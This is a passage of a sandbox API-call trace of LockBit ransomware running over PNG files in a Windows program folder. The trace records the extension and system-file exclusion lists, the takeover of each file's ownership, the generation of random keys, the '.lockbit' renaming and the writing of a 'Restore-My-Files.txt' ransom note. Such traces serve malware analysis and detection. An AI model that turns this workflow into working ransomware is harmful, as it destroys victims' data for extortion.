ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.405] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0092.405] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.405] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x701d, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0092.405] lstrcmpiW (lpString1=".", lpString2="16_9-frame-background.png") returned -1 [0092.405] lstrcmpiW (lpString1="..", lpString2="16_9-frame-background.png") returned -1 [0092.406] PathFindExtensionW (pszPath="16_9-frame-background.png") returned=".png" [0092.406] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.406] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.406] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.406] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.406] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.407] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-background.png") returned 1 [0092.407] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-background.png") returned 1 [0092.408] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-background.png") returned 1 [0092.408] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-background.png") returned 1 [0092.408] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-background.png") returned 1 [0092.408] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-background.png") returned 1 [0092.408] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-background.png") returned 1 [0092.408] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.408] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png") returned=".png" [0092.408] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.408] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.408] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.408] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.409] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.409] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.409] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.lockbit") returned 85 [0092.409] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.412] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.413] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.413] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.415] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.416] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.416] RtlFreeAnsiString (AnsiString="\\") [0092.416] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0092.416] malloc (_Size=0x200) returned 0x77d800 [0092.416] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.416] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.416] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.416] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.417] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.418] CloseHandle (hObject=0x11a0) returned 1 [0092.418] free (_Block=0x77d800) [0092.418] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0092.418] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.418] malloc (_Size=0x40068) returned 0x3e30078 [0092.420] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=28701) returned 1 [0092.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0092.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0092.426] ReadFile (in: hFile=0x11a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0092.430] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.430] malloc (_Size=0xc0) returned 0x77d800 [0092.430] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0092.430] free (_Block=0x77d800) [0092.430] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.430] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.430] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0092.431] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.431] malloc (_Size=0x40068) returned 0x3df0008 [0092.431] WriteFile (in: hFile=0x13d8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0092.434] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0092.434] lstrcmpiW (lpString1=".", lpString2="16_9-frame-highlight.png") returned -1 [0092.434] lstrcmpiW (lpString1="..", lpString2="16_9-frame-highlight.png") returned -1 [0092.434] PathFindExtensionW (pszPath="16_9-frame-highlight.png") returned=".png" [0092.434] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.434] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.435] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.435] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.435] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.435] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.436] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.436] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.437] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-highlight.png") returned 1 [0092.437] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.437] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png") returned=".png" [0092.437] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.437] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.437] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.437] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.438] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.438] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.438] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.lockbit") returned 84 [0092.438] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.441] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.442] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.442] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.443] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.444] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.444] RtlFreeAnsiString (AnsiString="\\") [0092.444] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0092.445] malloc (_Size=0x200) returned 0x77d800 [0092.445] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.445] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.445] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.445] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.446] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.446] CloseHandle (hObject=0x13dc) returned 1 [0092.446] free (_Block=0x77d800) [0092.446] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0092.446] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.446] malloc (_Size=0x40068) returned 0x1ff1e60 [0092.446] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1545) returned 1 [0092.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0092.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0092.526] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.527] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.527] malloc (_Size=0xbe) returned 0x77d800 [0092.528] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0092.528] free (_Block=0x77d800) [0092.528] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.528] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.528] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.528] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72669a5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72669a5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553c313d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc57, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-image-inset.png", cAlternateFileName="")) returned 1 [0092.529] lstrcmpiW (lpString1=".", lpString2="16_9-frame-image-inset.png") returned -1 [0092.529] lstrcmpiW (lpString1="..", lpString2="16_9-frame-image-inset.png") returned -1 [0092.529] PathFindExtensionW (pszPath="16_9-frame-image-inset.png") returned=".png" [0092.529] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 